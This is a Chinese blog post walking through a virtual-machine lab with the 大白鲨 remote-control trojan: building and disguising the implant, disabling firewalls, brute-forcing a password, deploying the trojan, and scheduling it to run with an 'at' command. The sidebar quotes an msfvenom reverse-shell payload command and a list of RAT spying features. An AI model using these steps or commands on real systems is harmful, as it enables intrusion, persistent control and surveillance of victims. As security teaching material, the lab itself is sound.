基础木马实验

最新推荐文章于 2024-04-24 09:45:11 发布
最新推荐文章于 2024-04-24 09:45:11 发布
阅读量729 收藏 4
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Goinhn/article/details/104573039
版权

基础木马实验

使用大白鲨远程管理工具

实验环境

客户端:windows xp
在这里插入图片描述
服务端:windows server 2003 r2
在这里插入图片描述

本地攻击

启动大白鲨软件
在这里插入图片描述
配置程序
在这里插入图片描述
ip处设置为当前主机的ip地址
在这里插入图片描述
点击生成服务端:
在这里插入图片描述
可以对生成的服务端程序进行修改文件名和更换图标,使得更具有隐蔽性,生成之后在主机中进行点击出发木马程序:
在这里插入图片描述
客户端程序中出现该上线的主机,可以在客户端中进行一些列的操作,各种参数的信息都显示在客户端中

远程攻击

上线服务端被攻击主机
配置两台攻击主机和被攻击主机在同一个局域网
win+r打开运行界面,输入control打开控制面板,选择网络和internet连接
在这里插入图片描述
进入后选择网络连接
在这里插入图片描述
右键选择本地连接的属性
在这里插入图片描述
选择TCP/IP的协议进入修改ip地址
在这里插入图片描述
服务端也进行相同的配置,保证两者在同一个局域网内
在这里插入图片描述
接下来就是要将木马的程序发送到服务端的主机上,在此之前先确保两者的防火墙处于关闭的状态,运行firewall.cpl进行检查:
在这里插入图片描述
获取服务端的用户密码:
使用字典工具进行暴力破解
运行终端命令和服务端程序进行连接:

在这里插入图片描述
复制木马程序到服务端的主机上并且运行,使得获得连接。

进一步使用

设置windows的计划任务程序,使得木马病毒定时启动

at \\10.0.0.2 12:12 \\10.0.0.2\c$\XXXX.exe

设置捆绑,将病毒软件和别的文件捆绑在一起,使得用户点击后自动运行。

Goinhn
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
木马攻击实验
qq_59468802的博客
10-20 1026
实验简介 实验所属系列:系统安全攻防技术与实践 实验对象: 本科/专科信息安全专业 相关课程及专业:计算机基础,网络安全 实验时数(学分):2学时 实验类别:实践实验类 预备知识 木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击甚至完全可能告知计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。 1、木马的传统连接技术 一般木马都采用...
2022秋季信息安全实验3
09-21
【标题】"2022秋季信息安全实验3"主要涵盖了信息安全领域的实践教学内容,这通常意味着学生将通过一系列实验操作来深入理解信息安全的基础知识、安全防护技术和攻防策略。在这个阶段,学生可能会学习如何检测、预防...
木马入侵演习实验
2401_83050569的博客
03-25 318
软件中,点击虚拟机菜单选项,找到设置,点击网络适配器,选择桥接模式即可。设置win2003的ip地址为192.168.147.127, 255..设置winxp的ip地址为192.168.147.125,255。在win2003虚拟机中双击木马文件在winxp上自由查看对方资源。在大白鲨远程管理软件中点击配置程序,制作一个木马文件。将美化后的木马文件放置到win2003的桌面上。在winxp上安装大白鲨远程管理软件。关闭这两台虚拟机的防火墙。
Msfvenom生成木马实验
最新发布
m0_74025111的博客
04-24 878
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。
木马基础知识要点
weixin_30265103的博客
04-04 2248
0x00 木马隐藏手段 程序中; 配置文件中; Win.ini中; 普通文件中; 注册表中; 驱动中(rootkit); 启动组(启动项); winstart.bat中(早于启动组); 启动文件中; 超链接中 0x01 木马发展   第一代:DLL(win中动态链接库的意思)木马。采用进程隐藏。采用内核推入式的嵌入方式,利用远程插入进程技术,嵌入到DLL进程,或...
木马程序的配置和使用实验
caesarding07
11-27 1654
木马程序的配置和使用实验实验准备实验环境实验过程生成木马控制文件通过nc.exe 开启远程shell通过远程shell传输木马文件 实验准备 控制机A和被控制机都需要安装两个软件 实验环境 控制机A 目标主机B IP:192.168.6.128 实验过程 生成木马控制文件 打开pcShare生成控制文件 不建议使用80端口,80端口一般被web占用,或者被保护 ip地址要控制在自己列表范围内(随意) 点击生成,建议放在控制机A nc程序的同级目录下 通过nc.exe 开启远程shell 在目
简单的木马制作并且运用
m0_46317658的博客
01-13 4967
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序并在目标主机上执行在本地监听上线。 实验环境:kali和windows7 在kali终端中进行: 一: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/h
北理大学计算机实验基础-实验18实验报告表.docx
03-10
实验报告表18-3木马攻击实验结果 局域网设备 感染方式 可能结果 1 执行病毒 被入侵 2 发送邮件 入侵电脑 3 4 5 注:未感染填无。 北理大学计算机实验基础-实验18实验报告表全文共2页,当前为第2页。北理大学计算机...
软件安全实验报告集.zip
12-01
在本压缩包“软件安全实验报告集.zip”中,包含了五个关键的实验,涉及软件安全领域的...通过这些实验,学习者可以提升对软件漏洞的敏感性,掌握检测和防范各种类型攻击的基本技能,为未来的网络安全实践打下坚实基础
VB编写木马基础到深入教程
11-15
【VB编写木马基础到深入教程】 VB,全称Visual Basic,是由微软公司开发的一种基于事件驱动的编程语言,尤其适合初学者入门。本教程旨在引导学习者从基础到深入理解如何利用VB来编写木马程序。木马,即特洛伊木马,...
病毒实验木马病毒实验
12-06
了解木马程序的结构、传播方法、安装与自启动机制,加深木马病毒原理的认识;掌握木马病毒的查杀一般方法。
大白鲨远程控制V1.5
04-20
大白鲨远控1.5 运行平台:Win2K、WinXP、Win03、WinVista、Win07、(Win2008没测试) 软件简介: 单一exe,不带DLL文件! DATA文件夹里面的有两个RAR文件,分配为两个功能完全相同的DATA.FILE: “DATA(注入进程兼容Win7).rar” //该DATA无壳, 没配置前 110KB ,压缩 51KB "DATA(注入进程不兼容Win7).rar" //该DATA无壳, 没配置前 390KB ,压缩 173KB 功能简介: 1.屏幕监控,可以查看对方屏幕以及鼠标监控、键盘监控、强制关闭显示器等。 2.视频监控、可以查看对方视频,含有MSH263,IndeoVideo5.04,IntelIndeo(R)VideoR3.2编码 3.CMD命令:模拟CMD。也就是telnet命令执行 4.文件管理:磁盘空间查看、文件浏览、WinRAR压缩解压(必须有安装WINRAR)、执行文件(以后缀执行/Exe类型执行)、上传、下载、删除、新建(文件/文件夹)... 5.进程管理:进程信息查看。包括进程创建时间,父进程ID等..,可以结束进程。 6.服务管理:服务信息查看。包括服务的PID、启动时间、模块路径、描述。等查看,可以对服务进行基本操作. 7.注册表管理:类似于注册表模拟器,可以删除指定注册表值,键,以及新建等.. 8.窗口管理:可以设置窗口标题、对窗口的其他操作,比如关闭窗口(包括父窗口)或隐藏窗口等... 9.键盘记录:可以查看对方输入了哪个键盘按键。 10.附加功能:分为“信息查看”与“插件管理”。 <1>信息查看:可以看对方系统信息,服务端配置信息,宽带信息需要上传指定插件才能查看! <2>插件管理”能上传插件“比如HTTP代理与宽带密码查看插件”。 11.其他管理:有点类似与恶作剧,有禁止鼠标活动与键盘活动功能==,还有查看剪切板字符串==等功能。 12.批量操作:分为“筛选主机”、“修改配置”、“发送信息”、“其它操作”4个面板! <1>筛选主机:可以筛选你先要进行批量操作的主机,如内存大于512MB,小于2048MB的主机=。 <2>修改配置:可以修改上线信息,如IP、端口或者备注! <3>发送信息:分为发生“窗口信息”和“屏幕字体”两种信息。 <4>其它操作:可以下载URL文件,隐藏打开网页、重启、关机、开启3389端口、更新被控端==功能 __________________________________________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^升级日志^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ UpdateTo1.5 1.31升级到1.4更新了有些多,因此该版本主要是1.4的修正版本!增强稳定性 更新日志: 1.增强稳定性 2.修正控制端与被控端停止视频编码/解码器的时候没释放掉的一些内存 3.其它代码更新... 修复BUG 1.其它远控的被控端会上线到大白鲨这来 2.被控端异常断线探测修正 3.控制端关闭的时候有其他网络的程序连接到大白鲨来可能会导致客服端卡住的bug 不兼容1.31版本之前的 __________________________________________________________________________________________________________ UpdateTo1.4 更新日志: 1.更新网络模块,可同时上线上万主机 2.屏幕模块,添加键盘发送、图片保存、透明区域截取、全屏模式、屏幕缩放模式、组合键发送=;(核心算法为DG大哥的,博客iamgyg.blog.163.com) 3.更新视频模块,支持USB无驱视频,传输速度流畅,添加 IntelIndeo(R)VideoR3.2 和 IndeoVideo5.04 编码 4.服务端添加非正常断线探测; 5.进程模块(添加显示进程创建时间,以及优化代码) 6.服务模块(添加已启动的服务的启动时间查看还有PID,以及优化代码) 7.注册表模块,以及代码优化 8.窗口模块(添加PID与窗口进程所在路径查看) 9.添加主机信息复制, 10.添加判断WIN7系统 11.其它更新 修正BUG 1.文件管理的文件修改时间显示错误。 2.时间久了会可能会出现播放有主机下线声音(实际上没看到主机下线) 3.修复win7系统下注入进程后无法创建线程,导致无法连接网络, 4.修复截取系统登录界面白屏
信息安全导论-实验指导01-网络安全基础实验1
08-03
5. **网络侦察与安全工具**:实验还涉及使用网络侦察工具来探测远程主机的安全漏洞,例如经典的网络安全工具netcat,可以用来开启监听端口,模拟远程木马功能,这有助于学习网络侦查技术和网络安全防护策略。...
天津理工大学信息安全网络攻击预防与技术实验4
11-28
实验结果表明,了解木马的工作原理是有效防御的基础。在实际环境中,应定期更新系统,加强防火墙设置,及时发现并终止可疑进程,避免成为恶意软件的目标。此外,提高用户的安全素养,不轻易下载未知程序,也是防止...
第28节 复习实验+利用445植入木马一(大飞哥网络安全初学者课程).mp4
07-18
大飞哥网络安全第一阶段课程,适合0基础/初学者体系化学习,也适合老手巩固基础观看,希望大家在学习过程中理解技术原理,为更深层次的防御攻击等学习打好基础。最好别用mac,好多工具不兼容。
4.2 木马攻防实验
qq_55202378的博客
07-27 1425
木马攻防
信息安全实训——神奇的木马
Clementi1的博客
08-10 1539
信息安全实训——神奇的木马
《信息安全技术》实验木马及远程控制技术
aezm18818的博客
11-27 1051
《信息安全技术》实验木马及远程控制技术 实验名称 木马及远程控制技术 实验目的 剖析网页木马的工作原理 理解木马的植入过程 学会编写简单的网页木马脚本 通过分析监控信息实现手动删除木马 实验人数 本组3人,20155331丹增旦达 20155334 曹翔 20155338 常胜杰 实验内容 木马生成与植入 利用木马实现远程控制 木马的删除 实验环境 系统环境 Windows Serv...
WINSOCK编程基础.ppt
11-13
本文介绍了WINSOCK编程基础的PPT内容,主要包括WINSOCK的概述、控件的属性、方法和事件,以及木马原理的实验安排。通过本课程的学习,希望学生能够了解windows socket、熟练掌握winsock控件的属性、方法和事件,以及...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值